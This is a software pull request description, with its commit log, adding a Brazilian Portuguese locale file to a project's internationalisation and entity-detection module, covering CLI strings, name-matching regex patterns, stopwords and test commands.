ru.json with full Russian translations for CLI strings, palace terminology, AAAK compression instruction, and regex patterns for topic/action extraction with Cyrillic character classes. No code changes needed -- the i18n module auto-discovers language files via *.json glob in the i18n directory. * feat(i18n): add entity detection section to Russian locale Cyrillic candidate/multi-word patterns, person-verb patterns (сказал, спросил, ответил, etc.), pronoun patterns, dialogue markers, direct address, and Russian stopwords. Follows the i18n entity framework from #911. * fix(i18n): apply review feedback on ru.json (#760) - mine_skip: "повторной раскопки" -> "повторной обработки" - quote_pattern: add Russian guillemet quotes «» Co-Authored-By: almirus <[email protected]> * feat(i18n): expand Russian entity stopwords with prepositions and conjunctions Adds 34 prepositions and conjunctions to reduce false positives in entity detection when these words appear sentence-initial. Co-Authored-By: almirus <[email protected]> * feat: add italian i18n support * feat: add italian entity patterns * Updated hi.json to support infra for entity,pronoun_patterns,dialogue_patterns,direct_address_pattern, project_verb_patterns and stopwords * feat(i18n): add Brazilian Portuguese locale with entity detection (closes #117) CLI strings, AAAK instruction, regex patterns, and entity section with person-verb, pronoun, dialogue, and candidate patterns for Latin+diacritics names (Joao, Ines, Angela). Follows the i18n entity framework from #911. * fix(i18n): address review feedback on pt-br.json - dialogue_patterns[0]: remove stray \" before > (fixes markdown quote matching) - entity stopwords: add 40 prepositions, conjunctions, and common words to reduce false positives - pronoun_patterns: add 2nd-person (você/vocês) and possessives (seu/sua/seus/suas) * feat(cli): add version display and version flag to CLI Introduces a version label to the command-line interface, displaying the current MemPalace version in the help text. Adds a `--version` flag to allow users to easily check the version and exit. * fix(i18n): resolve language codes case-insensitively (#927) BCP 47 language tags are case-insensitive (RFC 5646 §2.1.1) but the locale files mix conventions (pt-br.json vs zh-CN.json). On case-sensitive filesystems, '--lang PT-BR' or '--lang zh-cn' silently missed the file, _load_entity_section returned {}, and entity detection ran in English with no warning. The cache key in get_entity_patterns was built from raw input, so ('PT-BR',) and ('pt-br',) produced two distinct entries, both wrong. Add _canonical_lang(lang) that resolves any casing to the on-disk filename stem via lowercase comparison, and route load_lang, _load_entity_section, and the cache key through it. Closes #927 * fix(i18n): use Optional[str] for Python 3.9 compatibility PEP 604 union syntax (str | None) requires Python 3.10+. The project supports 3.9 per CI matrix, so use typing.Optional instead. * fix(entity_detector): script-aware word boundaries for combining-mark scripts Python's \b is a \w/non-\w transition. Devanagari vowel signs (matras) like ा ी ु are Unicode category Mc (Mark, Spacing Combining) — not \w. This means \b splits mid-word on every matra: names like अनीता (Anita) truncate to अनीत, and person-verb patterns like \bराज\s+ने\s+कहा\b never match because \b fails after the final matra of कहा. Same issue affects Arabic, Hebrew, Thai, Tamil, and every other script whose words contain combining marks. Fix: locales with combining-mark scripts declare a boundary_chars field in their entity section (e.g. "\\w\\u0900-\\u097F" for Hindi). The i18n loader replaces every \b in that locale's patterns with a script-aware lookaround that treats the declared characters as "inside-word", and pre-wraps candidate/multi_word patterns with the same boundary. Default behavior (no boundary_chars) keeps standard \b — en, pt-br, ru, it are unchanged. Changes: - mempalace/i18n/__init__…
What does this PR do?
Closes #117 by adding a Brazilian Portuguese locale (
pt-br.json) to the i18n module. This is the first non-English locale to include theentitysection introduced in #911, enabling entity detection for Portuguese text.Single-file change, no Python modifications.
What's in pt-br.json
CLI strings -- palace terminology (palacio, ala, corredor, armario, gaveta), all CLI messages, AAAK compression instruction, regex patterns for Portuguese topic extraction.
Entity detection (the
entitysection):candidate_pattern-- Latin+diacritics character class ([A-ZA-U][a-za-y]) so names like Joao, Ines, Angela are extracted as candidatesmulti_word_pattern-- same charset for multi-word namesperson_verb_patterns-- disse, perguntou, respondeu, contou, riu, sorriu, chorou, sentiu, pensa, quer, ama, odeia, sabe, decidiu, escreveupronoun_patterns-- ela/dele/ele/dela + pluralsdialogue_patterns-- Portuguese quoted speech markersdirect_address_pattern-- oi, ola, obrigado/obrigada, caro/caraproject_verb_patterns-- construindo, lancou, implantou, instalou + technical patternsstopwords(greetings, adverbs, prepositions, conjunctions, determiners, pronouns)Note:
caro/caraare intentionally NOT in stopwords -- they are valid first names in Portuguese/Italian/English.How to test
python -m pytest tests/test_entity_detector.py -v python -m pytest tests/ --ignore=tests/benchmarks ruff check .Quick smoke test:
Checklist
get_entity_patterns(("en", "pt-br"))score_entityruff check .cleanOriginal PR description (before #911 refactor, no longer applies)
What does this PR do?
Closes #117 by extending
entity_detectorso a file written in Brazilian Portuguese is treated the same way an English file is: names get extracted as candidates, and verb / pronoun / dialogue / direct-address patterns contribute to the person-vs-project classification. The change is purely additive, so English-only corpora behave exactly as before.Concretely:
PERSON_VERB_PATTERNS_PTBR,PRONOUN_PATTERNS_PTBR,DIALOGUE_PATTERNS_PTBRconstants with the Portuguese equivalents of the existing English signals (said/asked/replied/thinks/wants, plus greetingsoi/ola/obrigado/caro)._build_patternsconcatenates the English and pt-br lists for the dialogue and person-verb buckets, so every compiled matcher for an entity now covers both languages at once.score_entitymerges the English and pt-br pronoun lists for the proximity check.extract_candidateswidens its Latin-1 character class so accented names likeJoao,Ines,Angela, andAndreflow through candidate extraction instead of being silently dropped by an ASCII-only regex.STOPWORDSgets the Portuguese greeting fillers (oi,ola,obrigado,obrigada,caro,cara) so they do not masquerade as entity candidates when they start sentences.This approach was replaced after #911 landed -- all patterns now live in
mempalace/i18n/pt-br.jsoninstead of Python constants. Same detection coverage, zero Python changes.